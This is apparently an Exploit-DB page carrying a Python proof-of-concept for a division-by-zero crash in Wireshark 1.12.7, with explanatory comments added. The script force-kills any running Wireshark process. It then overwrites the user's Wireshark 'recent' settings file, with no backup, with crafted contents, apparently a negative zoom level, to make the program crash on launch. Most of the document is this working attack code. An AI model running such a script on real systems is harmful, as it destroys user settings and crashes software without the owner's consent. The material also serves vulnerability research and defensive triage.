Wireshark 1.12.7 – Division by Zero Crash (PoC)

  • 作者: spyk
    日期: 2015-09-18
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/38240/
  • # Exploit Title: Wireshark 1.12.7 Division by zero DOS PoC
    # Date: 02/09/2015
    # Exploit Author: spyk <spyk[dot]developpeur[at]gmail[dot]com> @SwanBeaujard
    # Vendor Homepage: https://www.wireshark.org/
    # Software Link: https://www.wireshark.org/download.html
    # Version: 1.12.7 
    # Tested on: Windows 7
    # Thanks to my professor @St0rn https://www.exploit-db.com/author/?a=8143
    
    import os
    import subprocess
    import getpass
    
    # Location of the per-user Wireshark "recent" settings file, assembled from
    # %SystemDrive% and the current login name.  os.environ.get() yields None
    # when the variable is unset (e.g. off Windows), which formats as "None".
    drive = os.environ.get("systemdrive")
    user = getpass.getuser()
    path = "%s\\Users\\%s\\AppData\\Roaming\\Wireshark\\recent" % (
        drive,
        user,
    )
     
    def wiresharkIsPresent():
        """Report whether a Wireshark.exe process shows up in ``tasklist``.

        Returns 1 when the raw ``tasklist`` output contains the text
        "Wireshark.exe", otherwise 0.  The check is a plain substring match on
        the whole listing, not a parse of the image-name column.
        """
        # Python 2 semantics: check_output() returns a str here.  Under
        # Python 3 it returns bytes and the substring test raises TypeError.
        task_listing = subprocess.check_output("tasklist")
        return 1 if "Wireshark.exe" in task_listing else 0
     
     
     
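    def killWireshark():
        """Force-terminate Wireshark.exe together with its child processes.

        Runs ``taskkill /F /IM Wireshark.exe /T``: ``/F`` forces termination,
        ``/IM`` selects by image name and ``/T`` includes child processes, so
        an unsaved capture in the running session is likely lost.  A script
        force-killing an analysis tool is also a pattern worth alerting on in
        process-creation telemetry.

        Returns:
            1 if taskkill exited with status 0, otherwise 0 (non-zero exit
            status, or taskkill could not be started).
        """
        try:
            subprocess.check_output("taskkill /F /IM Wireshark.exe /T")
        except (subprocess.CalledProcessError, OSError):
            # Only the expected failures map to 0; the original bare ``except``
            # also swallowed KeyboardInterrupt and programming errors.
            return 0
        return 1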
     
     
     
    # A running Wireshark is force-terminated before the settings file is
    # touched -- presumably because, per the header inside the file contents
    # further down, Wireshark regenerates that file on a normal quit.
    # print(...) with a single string behaves the same on Python 2 and 3.
    if wiresharkIsPresent() and killWireshark():
        print("Wireshark is killed!")
     
    # Replacement contents for the per-user Wireshark "recent" file at `path`;
    # the layout appears to follow the file Wireshark 1.12.7 writes itself (see
    # the header comment inside the literal).
    # NOTE(review): the page does not name the key behind the division by zero.
    # gui.zoom_level: -10 is the one numeric value here that looks out of range,
    # so it is presumably the trigger -- confirm against the upstream fix.
    # NOTE(review): every line of this listing carries the same leading spaces,
    # so the indentation inside the literal is probably page layout rather than
    # part of the original file.
    # Triage: if Wireshark crashes right after this file was rewritten, inspect
    # it for values like the above; removing the file should make Wireshark
    # start from defaults -- TODO confirm on the affected version.
    # Only the last setting is dynamic: it splices in `drive` and `user`.
    sploit="""
    # Recent settings file for Wireshark 1.12.7.
    #
    # This file is regenerated each time Wireshark is quit
    # and when changing configuration profile.
    # So be careful, if you want to make manual changes here.
     
     
    # Main Toolbar show (hide).
    # TRUE or FALSE (case-insensitive).
    gui.toolbar_main_show: TRUE
     
    # Filter Toolbar show (hide).
    # TRUE or FALSE (case-insensitive).
    gui.filter_toolbar_show: TRUE
     
    # Wireless Settings Toolbar show (hide).
    # TRUE or FALSE (case-insensitive).
    gui.wireless_toolbar_show: FALSE
     
    # Show (hide) old AirPcap driver warning dialog box.
    # TRUE or FALSE (case-insensitive).
    gui.airpcap_driver_check_show: TRUE
     
    # Packet list show (hide).
    # TRUE or FALSE (case-insensitive).
    gui.packet_list_show: TRUE
     
    # Tree view show (hide).
    # TRUE or FALSE (case-insensitive).
    gui.tree_view_show: TRUE
     
    # Byte view show (hide).
    # TRUE or FALSE (case-insensitive).
    gui.byte_view_show: TRUE
     
    # Statusbar show (hide).
    # TRUE or FALSE (case-insensitive).
    gui.statusbar_show: TRUE
     
    # Packet list colorize (hide).
    # TRUE or FALSE (case-insensitive).
    gui.packet_list_colorize: TRUE
     
    # Timestamp display format.
    # One of: RELATIVE, ABSOLUTE, ABSOLUTE_WITH_DATE, DELTA, DELTA_DIS, EPOCH, UTC, UTC_WITH_DATE
    gui.time_format: RELATIVE
     
    # Timestamp display precision.
    # One of: AUTO, SEC, DSEC, CSEC, MSEC, USEC, NSEC
    gui.time_precision: AUTO
     
    # Seconds display format.
    # One of: SECONDS, HOUR_MIN_SEC
    gui.seconds_format: SECONDS
     
    # Zoom level.
    # A decimal number.
    gui.zoom_level: -10
     
    # Bytes view.
    # A decimal number.
    gui.bytes_view: 0
     
    # Main window upper (or leftmost) pane size.
    # Decimal number.
    gui.geometry_main_upper_pane: 440
     
    # Main window middle pane size.
    # Decimal number.
    gui.geometry_main_lower_pane: 428
     
    # Packet list column pixel widths.
    # Each pair of strings consists of a column format and its pixel width.
    column.width: %m, 59, %t, 84, %s, 154, %d, 154, %p, 56, %L, 48, %i, 1285
     
     # Last directory navigated to in File Open dialog.
    gui.fileopen_remembered_dir: """+drive+"""\\Users\\"""+user+"""\\Documents\\
    """
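    # Overwrites the user's existing "recent" file in place.  No backup is
    # taken, so the previous GUI settings are lost; keep a copy of the file
    # when reproducing this on a workstation whose settings matter.
    try:
        # ``with`` closes the handle even when write() fails; the original
        # leaked it on that path.
        with open(path, "w") as recent_file:
            recent_file.write(sploit)
    except (IOError, OSError):
        # Missing or unwritable profile directory.  Other exceptions now
        # propagate instead of being hidden by a bare ``except``.
        print("Fail :(")
    else:
        print("Success!")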